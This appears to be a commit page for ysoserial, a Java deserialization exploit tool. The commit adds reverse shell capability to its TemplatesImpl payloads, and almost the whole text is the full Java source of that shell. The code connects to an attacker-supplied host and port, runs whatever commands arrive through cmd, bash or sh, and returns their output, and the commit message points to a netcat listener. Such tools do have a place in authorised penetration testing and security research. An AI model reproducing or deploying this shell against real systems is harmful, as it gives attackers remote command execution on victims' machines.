ysoserial
ysoserial copied to clipboard
Published
20 hours ago •
frohoff
frohoff
Added reverse shell capability for TemplatesImpl payloads.
Added a simple reverse command shell which also supports pipes and redirection shell operators. Works with e.g. a netcat listener. For ease of reading/review the shell code is as follows:
java.net.Socket sck = null;
java.io.OutputStream out;
java.io.BufferedReader rdr;
Process proc;
String cmd = "";
String os = System.getProperty("os.name").toLowerCase(java.util.Locale.ENGLISH);
try {
sck = new java.net.Socket(java.net.InetAddress.getByName(args[0]), Integer.parseInt(args[1]));
out = sck.getOutputStream();
rdr = new java.io.BufferedReader(new java.io.InputStreamReader(sck.getInputStream()));
while(cmd.trim().toLowerCase(java.util.Locale.ENGLISH).equals("exit") == false) {
try {
out.write("> ".getBytes(), 0, "> ".getBytes().length);
cmd = rdr.readLine();
if(cmd.trim().toLowerCase(java.util.Locale.ENGLISH).equals("exit") == false) {
if(os.contains("win")) {
proc = new ProcessBuilder("cmd", "/c", "\"" + cmd.trim() + "\"").redirectErrorStream(true).start();
} else {
try {
proc = new ProcessBuilder("/bin/bash", "-c", cmd.trim()).redirectErrorStream(true).start();
} catch(java.io.IOException ioe) {
if(ioe.getMessage().contains("Cannot run program")) {
try {
proc = new ProcessBuilder("/bin/sh", "-c", cmd.trim()).redirectErrorStream(true).start();
} catch(java.io.IOException ioe2) {
if(ioe2.getMessage().contains("Cannot run program")) {
throw new java.io.IOException("Non-Windows target and neither /bin/bash or /bin/sh is present.");
} else {
throw ioe2;
}
}
} else {
throw ioe;
}
}
}
proc.waitFor();
byte[] b = new byte[proc.getInputStream().available()];
proc.getInputStream().read(b);
out.write(b);
}
} catch(Exception ex) {
out.write(("[-] Exception: " + ex.toString()).getBytes());
}
}
sck.close();
} catch(Exception ex) {
if(sck != null) {
try {
sck.close();
} catch(Exception ex2) {}
}
}
